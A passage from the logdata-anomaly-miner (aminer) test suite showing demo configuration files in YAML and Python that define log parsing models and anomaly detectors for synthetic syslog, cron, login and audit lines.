    a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None)
    b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement])
    rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector),
             Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)]
    time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config,
                                                                           rules, anomaly_event_handlers)
    analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector")
    atom_filter.add_handler(time_correlation_violation_detector)
logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/demo-config.yml000066400000000000000000000710621500476301700261200ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - url: 'file:///tmp/syslog' parser_id: 'model' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 AminerId: 'demo-aminer' Parser: - id: space type: FixedDataModelElement name: 'Space' args: ' Current Disk Data is: Filesystem Type Size Used Avail Use%' - id: data type: DelimitedDataModelElement name: 'Data' delimiter: '%''/' - id: rest type: AnyByteDataModelElement name: 'Rest' - id: userLoginDetails type: FixedDataModelElement name: 'User' args: 'User ' - id: userIpAddress type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' delimiter: ' ' - id: status type: FixedWordlistDataModelElement name: 'Status' args: - ' logged in' - ' logged out' - id: blank type: FixedDataModelElement name: 'Blank' args: ' ' - id: minutes type: DecimalIntegerValueModelElement name: 'Minutes' - id: ago type: FixedDataModelElement name: 'Ago' args: ' minutes ago.' 
- id: time type: SequenceModelElement name: 'Time' args: - blank - minutes - ago - id: pastTime type: OptionalMatchModelElement name: 'PastTime' args: time - id: dtm type: DateTimeModelElement name: 'DTM' date_format: '%Y-%m-%d %H:%M:%S' start_year: null text_locale: null max_time_jump_seconds: 86400 - id: uNameSpace1 type: FixedDataModelElement name: 'UNameSpace1' args: ' ' - id: uName type: DelimitedDataModelElement name: 'UName' delimiter: ' ' - id: uNameSpace2 type: FixedDataModelElement name: 'UNameSpace2' args: ' ' - id: delimitedUser type: DelimitedDataModelElement name: 'User' delimiter: ' ' - id: cron type: FixedDataModelElement name: 'Cron' args: ' cron[' - id: jobNumber type: DecimalIntegerValueModelElement name: 'JobNumber' - id: details type: FixedDataModelElement name: 'Details' args: ']: Job `cron.daily` started.' - id: spaceRandom type: FixedDataModelElement name: 'Space' args: 'Random: ' - id: random type: DecimalIntegerValueModelElement name: 'Random' - id: fixedTemp type: FixedDataModelElement name: 'FixedTemp' args: 'CPU Temp: ' - id: temp type: DecimalIntegerValueModelElement name: 'Temp' - id: degrees type: FixedDataModelElement name: 'Degrees' args: '°C' - id: cpuTemp type: SequenceModelElement name: 'CPUTemp' args: - fixedTemp - temp - degrees - id: space1 type: FixedDataModelElement name: 'Space1' args: ', ' - id: fixedWorkload type: FixedDataModelElement name: 'FixedWorkload' args: 'CPU Workload: ' - id: workload type: DecimalIntegerValueModelElement name: 'Workload' - id: percent type: FixedDataModelElement name: 'Percent' args: '%' - id: cpuWorkload type: SequenceModelElement name: 'CPUWorkload' args: - fixedWorkload - workload - percent - id: space2 type: FixedDataModelElement name: 'Space2' args: ', ' - id: action type: FixedDataModelElement name: 'Action' args: ' changed IP address to ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: fixedSpace type: FixedDataModelElement name: 'Space' args: ' ' - id: run type: 
FixedDataModelElement name: 'Run' args: ']: Will run job `' - id: cronType type: FixedWordlistDataModelElement name: 'CronType' args: - 'cron.daily' - 'cron.hourly' - 'cron.monthly' - 'cron.weekly' - id: startTime type: FixedDataModelElement name: 'StartTime' args: "' in 5 min." - id: emptySpace1 type: FixedDataModelElement name: 'Space1' args: ' ' - id: job type: FixedDataModelElement name: 'Job' args: ']: Job `' - id: started type: FixedDataModelElement name: 'Started' args: "' started" - id: typePath type: FixedDataModelElement name: 'type' args: 'type=PATH ' - id: msgAudit type: FixedDataModelElement name: 'msg_audit' args: 'msg=audit(' - id: msg type: DelimitedDataModelElement name: 'msg' delimiter: ':' - id: placeholder type: FixedDataModelElement name: 'placeholder' args: ':' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: item_string type: FixedDataModelElement name: 'item_string' args: '): item=' - id: item type: DecimalIntegerValueModelElement name: 'item' - id: name_string type: FixedDataModelElement name: 'name_string' args: ' name="' - id: name type: DelimitedDataModelElement name: 'name' delimiter: '"' - id: inode_string type: FixedDataModelElement name: 'inode_string' args: '" inode=' - id: inode type: DecimalIntegerValueModelElement name: 'inode' - id: dev_string type: FixedDataModelElement name: 'dev_string' args: ' dev=' - id: dev type: DelimitedDataModelElement name: 'dev' delimiter: ' ' - id: mode_string type: FixedDataModelElement name: 'mode_string' args: ' mode=' - id: mode type: DecimalIntegerValueModelElement name: 'mode' value_pad_type: "zero" - id: ouid_string type: FixedDataModelElement name: 'ouid_string' args: ' ouid=' - id: ouid type: DecimalIntegerValueModelElement name: 'ouid' - id: ogid_string type: FixedDataModelElement name: 'ogid_string' args: ' ogid=' - id: ogid type: DecimalIntegerValueModelElement name: 'ogid' - id: rdev_string type: FixedDataModelElement name: 'rdev_string' args: ' rdev=' - id: rdev type: 
DelimitedDataModelElement name: 'rdev' delimiter: ' ' - id: nametype_string type: FixedDataModelElement name: 'nametype_string' args: ' nametype=' - id: nametype type: FixedWordlistDataModelElement name: 'nametype' args: - 'NORMAL' - 'ERROR' - id: path type: SequenceModelElement name: 'path' args: - typePath - msgAudit - msg - placeholder - id - item_string - item - name_string - name - inode_string - inode - dev_string - dev - mode_string - mode - ouid_string - ouid - ogid_string - ogid - rdev_string - rdev - nametype_string - nametype - id: typeSyscall type: FixedDataModelElement name: 'type' args: 'type=SYSCALL ' - id: arch_string type: FixedDataModelElement name: 'arch_string' args: '): arch=' - id: arch type: DelimitedDataModelElement name: 'arch' delimiter: ' ' - id: syscall_string type: FixedDataModelElement name: 'syscall_string' args: ' syscall=' - id: syscall1 type: DecimalIntegerValueModelElement name: 'syscall' - id: success_string type: FixedDataModelElement name: 'success_string' args: ' success=' - id: success type: FixedWordlistDataModelElement name: 'success' args: - 'yes' - 'no' - id: exit_string type: FixedDataModelElement name: 'exit_string' args: ' exit=' - id: exit type: DecimalIntegerValueModelElement name: 'exit' - id: remainding_data type: AnyByteDataModelElement name: 'remainding_data' - id: syscall type: SequenceModelElement name: 'syscall' args: - typeSyscall - msgAudit - msg - placeholder - id - arch_string - arch - syscall_string - syscall1 - success_string - success - exit_string - exit - remainding_data - id: dateTimeModelElement type: DateTimeModelElement name: 'DateTimeModelElement' date_format: 'Current DateTime: %d.%m.%Y %H:%M:%S' time_zone: 'UTC' - id: decimalFloatValueModelElement type: DecimalFloatValueModelElement name: 'DecimalFloatValueModelElement' value_sign_type: 'optional' - id: decimalIntegerValueModelElement type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' value_sign_type: 'optional' 
value_pad_type: 'blank' - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' delimiter: ';' - id: fixedDataModelElement1 type: FixedDataModelElement name: 'FixedDataModelElement' args: ';' - id: se type: SequenceModelElement name: 'se' args: - delimitedDataModelElement - fixedDataModelElement1 - id: fixed1 type: FixedDataModelElement name: 'fixed1' args: 'match ' - id: fixed2 type: FixedDataModelElement name: 'fixed2' args: 'fixed String' - id: wordlist type: FixedWordlistDataModelElement name: 'wordlist' args: - 'data: ' - 'string: ' - id: decimal type: DecimalIntegerValueModelElement name: 'decimal' - id: seq1 type: SequenceModelElement name: 'seq1' args: - fixed1 - wordlist - id: seq2 type: SequenceModelElement name: 'seq2' args: - fixed1 - wordlist - fixed2 - id: first type: FirstMatchModelElement name: 'first' args: - seq1 - seq2 - id: elementValueBranchModelElement type: ElementValueBranchModelElement name: 'ElementValueBranchModelElement' args: - first - 'wordlist' branch_model_dict: - id: 0 model: decimal - id: 1 model: fixed2 - id: hexStringModelElement type: HexStringModelElement name: 'HexStringModelElement' - id: fixedDataModelElement2 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'Gateway IP-Address: ' - id: ipAddressDataModelElement type: IpAddressDataModelElement name: 'IpAddressDataModelElement' - id: se2 type: SequenceModelElement name: 'se2' args: - fixedDataModelElement2 - ipAddressDataModelElement - id: multiLocaleDateTimeModelElement type: MultiLocaleDateTimeModelElement name: 'MultiLocaleDateTimeModelElement' date_formats: - format: - '%b %d %Y' - null - 'en_US.utf8' - id: fixedDataModelElementDrawnNumber type: FixedDataModelElement name: 'FixedDataModelElement' args: '[drawn number]: ' - id: decimalIntegerValueModelElement1 type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' - id: sequenceModelElement type: SequenceModelElement name: 
'SequenceModelElement' args: - fixedDataModelElementDrawnNumber - decimalIntegerValueModelElement1 - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 1 - id: variableByteDataModelElement type: VariableByteDataModelElement name: 'VariableByteDataModelElement' args: '-@#' - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' - id: fixed type: FixedDataModelElement name: 'fixed' args: ' ' - id: se3 type: SequenceModelElement name: 'se3' args: - whiteSpaceLimitedDataModelElement - fixed - id: base64StringModelElement type: Base64StringModelElement name: 'Base64StringModelElement' - id: fixed3 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'The-searched-element-was-found!' - id: fixedDME type: FixedDataModelElement name: 'fixedDME' args: 'Any:' - id: any type: AnyByteDataModelElement name: 'AnyByteDataModelElement' - id: seq4 type: SequenceModelElement name: 'se4' args: - fixedDME - any - id: firstMatchModelElement type: FirstMatchModelElement name: 'FirstMatchModelElement//optional' args: - fixed3 - seq4 - id: optionalMatchModelElement type: OptionalMatchModelElement name: '/' args: firstMatchModelElement - id: g type: FixedDataModelElement name: 'g' args: 'g' - id: h type: FixedDataModelElement name: 'h' args: 'h' - id: i type: FixedDataModelElement name: 'i' args: 'i' - id: j type: FixedDataModelElement name: 'j' args: 'j' - id: k type: FixedDataModelElement name: 'k' args: 'k' - id: l type: FixedDataModelElement name: 'l' args: 'l' - id: cronAnnouncement type: SequenceModelElement name: 'CronAnnouncement' args: - dtm - fixedSpace - uName - cron - jobNumber - run - cronType - startTime - id: cronExecution type: SequenceModelElement name: 'CronExecution' args: - dtm - emptySpace1 - uName - cron - jobNumber - job - cronType - started - id: dailyCron type: SequenceModelElement name: 
'DailyCron' args: - dtm - uNameSpace1 - uName - uNameSpace2 - delimitedUser - cron - jobNumber - details - id: diskReport type: SequenceModelElement name: 'DiskReport' args: - space - data - rest - id: loginDetails type: SequenceModelElement name: 'LoginDetails' args: - userLoginDetails - username - status - pastTime - id: randomTime type: SequenceModelElement name: 'RandomTime' args: - spaceRandom - random - id: sensors type: SequenceModelElement name: 'Sensors' args: - cpuTemp - space1 - cpuWorkload - space2 - dtm - id: ipAddresses type: SequenceModelElement name: 'IPAddresses' args: - userIpAddress - username - action - ip - id: type type: FirstMatchModelElement name: 'type' args: - path - syscall - id: ecd type: FirstMatchModelElement name: 'ECD' args: - g - h - i - j - k - l - id: parsingME type: FirstMatchModelElement name: 'ParsingME' args: - dateTimeModelElement - decimalFloatValueModelElement - decimalIntegerValueModelElement - se - elementValueBranchModelElement - hexStringModelElement - se2 - multiLocaleDateTimeModelElement - repeatedElementDataModelElement - variableByteDataModelElement - se3 - base64StringModelElement - optionalMatchModelElement - id: model start: True type: FirstMatchModelElement name: 'model' args: - cronAnnouncement - cronExecution - dailyCron - diskReport - loginDetails - random - randomTime - sensors - ipAddresses - type - ecd - parsingME Input: timestamp_paths: ["/model/DailyCron/DTM"] adjust_timestamps: True use_real_time: True Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: DebugMatchRule id: debug_match_rule debug_mode: True - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: 
NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" - "debug_match_rule" - type: AndMatchRule id: and_match_rule2 sub_rules: - "negation_match_rule1" - "path_exists_match_rule2" - "debug_match_rule" - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" - type: ParserCount id: ParserCount report_interval: 10 - type: EventTypeDetector id: EventTypeDetector - type: VariableTypeDetector id: VariableTypeDetector event_type_detector: EventTypeDetector silence_output_except_indicator: False output_logline: False ignore_list: - "/model/RandomTime" - type: VariableCorrelationDetector id: VariableCorrelationDetector event_type_detector: EventTypeDetector ignore_list: - "/model/RandomTime" - type: TSAArimaDetector id: TSAArimaDetector event_type_detector: EventTypeDetector - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 0.5 - type: EventSequenceDetector id: EventSequenceDetector id_path_list: - '/model/ParsingME' ignore_list: - '/model/ECD/g' - '/model/ECD/h' - '/model/ECD/i' - '/model/ECD/j' - '/model/ECD/k' - '/model/ECD/l' - '/model/Random' - '/model/RandomTime' - '/model/DailyCron' - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True - type: ModuloTimeMatchRule id: "mt" path: "mtmr" seconds_modulo: 3 lower_limit: 0 upper_limit: 3 - type: ValueDependentModuloTimeMatchRule id: "vdmt" path: "vdmtmr" seconds_modulo: 3 paths: - 
"/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" limit_lookup_dict: e: - 0 - 2.95 default_limit: - 0 - 3 - type: ValueDependentDelegatedMatchRule id: "value_dependent_delegated_match_rule" paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" rule_lookup_dict: (b"g",): "mt" (b"h",): "mt" (b"i",): "mt" (b"j",): "vdmt" (b"k",): "vdmt" (b"l",): "vdmt" default_rule: "mt" - type: EventGenerationMatchAction id: "ip_match_action" event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" - type: IPv4InRFC1918MatchRule id: "ipv4_in_rfc1918_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" match_action: "ip_match_action" - type: DebugHistoryMatchRule id: "debug_history_match_rule" debug_mode: True - type: ValueListMatchRule id: "value_list_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" value_list: - 134744072 - 134743044 - type: NegationMatchRule id: "negation_list" sub_rule: "value_list_match_rule" - type: ValueRangeMatchRule id: "value_range_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" lower_limit: 167772160 upper_limit: 184549375 - type: NegationMatchRule id: "negation_range" sub_rule: "value_range_match_rule" - type: StringRegexMatchRule id: "string_regex_match_rule" path: "/model/type/syscall/success" regex: "^no$" - type: NegationMatchRule id: "negation_string_regex" sub_rule: "string_regex_match_rule" - type: ParallelMatchRule id: "parallel_match_rule" sub_rules: - "value_dependent_delegated_match_rule" - "ipv4_in_rfc1918_match_rule" - "debug_history_match_rule" - type: AndMatchRule id: "time_and_match_rule" sub_rules: - "parallel_match_rule" - "negation_list" - "negation_range" - "negation_string_regex" - type: AllowlistViolationDetector id: TimeAllowlist allowlist_rules: - "time_and_match_rule" - type: LinearNumericBinDefinition id: linear_numeric_bin_definition 
lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: null paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" separator: ";" missing_value_string: "" - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True log_resource_ignore_list: - 'file:///tmp/other_syslog' - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 - type: CorrelationRule rule_id: correlation_rule min_time_delta: 5 max_time_delta: 6 artefact_match_parameters: [["/model/CronAnnouncement/JobNumber", 
"/model/CronExecution/JobNumber"]] - type: EventClassSelector action_id: a_class_selector artefact_a_rules: - correlation_rule - type: EventClassSelector action_id: b_class_selector artefact_b_rules: - correlation_rule - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/jsonConverterHandler-demo-config.py000066400000000000000000000745071500476301700321130ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from 
aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relative to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. 
# State that aminer keeps between invocations lives here. The demo points it
# at a /tmp path; whatever the location, aminer refuses to start when the
# directory is group/world readable, so it must belong to the AminerUser only.
config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer'

# Mail alerting. Leaving MailAlerting.TargetAddress undefined disables the
# e-mail notification hooks altogether; the demo simply mails root on this host.
config_properties.update({
    # Recipient of alert e-mails.
    'MailAlerting.TargetAddress': 'root@localhost',
    # Sender address; when undefined, the host's "sendmail" implementation
    # decides which sender address to use.
    'MailAlerting.FromAddress': 'root@localhost',
    # Text prepended to the standard aminer subject (default "aminer Alerts:").
    'MailAlerting.SubjectPrefix': 'aminer Alerts:',
    # Seconds after startup before aminer reacts to an event and sends the
    # first alert e-mail (default 0: any event may trigger alerting at once).
    'MailAlerting.AlertGraceTime': 0,
    # Seconds to keep collecting events after the first one triggered the
    # alerting procedure before the e-mail is actually sent (default 10);
    # everything collected in that window goes out in a single e-mail.
    'MailAlerting.EventCollectTime': 0,
    # Minimum gap in seconds between two alert e-mails, to avoid spamming
    # (default 600); events arriving within the gap are held for the next report.
    'MailAlerting.MinAlertGap': 0,
    # Maximum gap in seconds between two alert e-mails. When undefined it equals
    # MailAlerting.MinAlertGap; when set it enables exponential backoff during
    # permanent error states, growing the gap by 50% each time further
    # alert-worthy events are recorded before the previous gap has elapsed.
    'MailAlerting.MaxAlertGap': 600,
})

# Define the upper bound on how many events are included in one alert mail.
This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), 
DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), 
FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) 
decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. 
